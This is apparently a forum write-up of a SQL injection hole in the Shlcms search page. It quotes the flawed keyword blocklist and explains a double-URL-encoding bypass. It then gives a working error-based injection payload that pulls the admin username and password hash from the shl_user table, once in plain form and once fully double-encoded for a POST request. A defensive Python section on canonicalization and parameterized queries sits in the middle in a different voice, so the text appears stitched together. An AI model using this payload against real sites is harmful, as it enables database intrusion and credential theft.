Shlcms injection vulnerability

A new year, and also my 16th birthday, so today I'm writing up a few trivial holes I found. Happy birthday to me.
I'm not very good, so I can only dig up trivial ones like these. Wishing 90sec goes from strength to strength too.
And thanks to the experts for their continued guidance to a newbie @L.N. @laterain
___________________________________________________________________________

The new version of Shlcms

shlcms\content\search\index.php filters the keyword parameter:

// Blocklist check on the search keyword: returns 1 if any of the listed tokens appears
// in the (lower-cased) input, 0 otherwise. Note the check only sees the value as it is
// received; the /i flag is redundant after strtolower().
function checkSqlStr($string)
{
    $string = strtolower($string);
    return preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|_user/i', $string);
}

But because the value is URL-decoded again after this check runs, the filtering function can be bypassed outright: as long as % itself isn't filtered, a double-encoded payload passes the check in its encoded form and only turns into the real characters afterwards. GPC (magic_quotes_gpc) makes no difference either.
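To make the ordering problem concrete from the defender's side, here is an added example (my own code, not Shlcms code): a Python port of the page's checkSqlStr() blocklist, the flawed check-then-decode order beside a corrected canonicalize-then-check order, and a parameterized query as the real fix. The sample keyword, the table name shl_content and its rows are constructed for the demonstration.

```python
import re
import sqlite3
from urllib.parse import unquote

# Python port of the page's checkSqlStr() blocklist (illustration only, not the CMS's code).
BLOCKLIST = re.compile(
    r"select|insert|update|delete|'|/\*|\*|\.\./|\./|union|into|load_file|outfile|_user",
    re.IGNORECASE,
)


def check_sql_str(string: str) -> bool:
    """Return True when a blocklisted token is present, i.e. the input would be rejected."""
    return BLOCKLIST.search(string.lower()) is not None


def vulnerable_flow(keyword: str) -> tuple[bool, str]:
    """Flawed order from the post: check the value as received, then URL-decode it
    once more before it reaches the query. The check never sees the decoded bytes."""
    rejected = check_sql_str(keyword)
    value_used_in_query = unquote(keyword)  # decoding happens after the check
    return rejected, value_used_in_query


def canonicalize(raw: str, max_rounds: int = 4) -> str:
    """URL-decode until the value stops changing, so the check and the query
    see the same bytes. Bounded so a hostile input cannot keep us looping."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            return decoded
        current = decoded
    raise ValueError("too many encoding layers")


def fixed_flow(keyword: str) -> tuple[bool, str]:
    """Corrected order: canonicalize first, then run the same blocklist on the result."""
    canonical = canonicalize(keyword)
    return check_sql_str(canonical), canonical


def search_titles(keyword: str) -> list[str]:
    """The actual fix: a parameterized query, so the keyword is data, never SQL.
    Uses an in-memory SQLite table with constructed rows (table name shl_content is made up)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shl_content (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO shl_content (title) VALUES (?)",
        [("dba notes",), ("dbms basics",), ("hello world",)],
    )
    # Escape LIKE wildcards so a keyword of '%' or '_' cannot match every row.
    escaped = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    rows = conn.execute(
        "SELECT title FROM shl_content WHERE title LIKE ? ESCAPE '\\' ORDER BY id",
        ("%" + escaped + "%",),
    ).fetchall()
    conn.close()
    return [row[0] for row in rows]


if __name__ == "__main__":
    # Constructed sample: a keyword that is still URL-encoded once when the check runs.
    encoded_keyword = "dba%27 and 1%3D1"
    print("vulnerable:", vulnerable_flow(encoded_keyword))  # (False, "dba' and 1=1")
    print("fixed:     ", fixed_flow(encoded_keyword))       # (True, "dba' and 1=1")
    print("query:     ", search_titles("dba' and 1=1"))     # []
    print("query:     ", search_titles("db"))               # ['dba notes', 'dbms basics']
```

The point of the first two functions is that a blocklist is only as good as the representation it inspects: vulnerable_flow lets the encoded keyword through and then hands the decoded quote to the query, while fixed_flow rejects it because it checks the canonical form. Even with the order corrected, a token blocklist stays fragile (it also blocks legitimate keywords such as "users"), which is why search_titles binds the keyword as a parameter instead of relying on the filter at all.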

The POST exploit data is the payload below, double URL-encoded:

dba%' and(select 1 from(select count(*),concat(floor(rand(0)*2),0x3a,(select(select(SELECT concat(username,0x3a,pwd)FROM shl_user limit 0,1))from information_schema.tables limit 0,1))x from information_schema.tables group by x)a) and 1=1#

%25%36%34%25%36%32%25%36%31%25%32%35%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%36%33%25%36%66%25%37%35%25%36%65%25%37%34%25%32%38%25%32%61%25%32%39%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%36%36%25%36%63%25%36%66%25%36%66%25%37%32%25%32%38%25%37%32%25%36%31%25%36%65%25%36%34%25%32%38%25%33%30%25%32%39%25%32%61%25%33%32%25%32%39%25%32%63%25%33%30%25%37%38%25%33%33%25%36%31%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%38%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%37%35%25%37%33%25%36%35%25%37%32%25%36%65%25%36%31%25%36%64%25%36%35%25%32%63%25%33%30%25%37%38%25%33%33%25%36%31%25%32%63%25%37%30%25%37%37%25%36%34%25%32%39%25%34%36%25%35%32%25%34%66%25%34%64%25%32%30%25%37%33%25%36%38%25%36%63%25%35%66%25%37%35%25%37%33%25%36%35%25%37%32%25%32%30%25%36%63%25%36%39%25%36%64%25%36%39%25%37%34%25%32%30%25%33%30%25%32%63%25%33%31%25%32%39%25%32%39%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%39%25%36%65%25%36%36%25%36%66%25%37%32%25%36%64%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%35%66%25%37%33%25%36%33%25%36%38%25%36%35%25%36%64%25%36%31%25%32%65%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%37%33%25%32%30%25%36%63%25%36%39%25%36%64%25%36%39%25%37%34%25%32%30%25%33%30%25%32%63%25%33%31%25%32%39%25%32%39%25%37%38%25%32%30%25%36%36%25%37%32%25%36%66%25%36%64%25%32%30%25%36%39%25%36%65%25%36%36%25%36%66%25%37%32%25%36%64%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%35%66%25%37%33%25%36%33%25%36%38%25%36%35%25%36%64%25%36%31%25%32%65%25%37%34%25%36%31%25%36%32%25%36%63%25%36%35%25%37%33%25%32%30%25%36%37%25%37%32%25%36%66%25%37%35%25%37%30%25%32%30%25%36%32%25%37%39%25%32%30%25%37%38%25%32%39%25%36%31%25%32%39%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%33%31%25%33%64%25%33%31%25%32%33

The password seems to be sha1 + md5 plus something or other; anyway, you usually can't crack it.
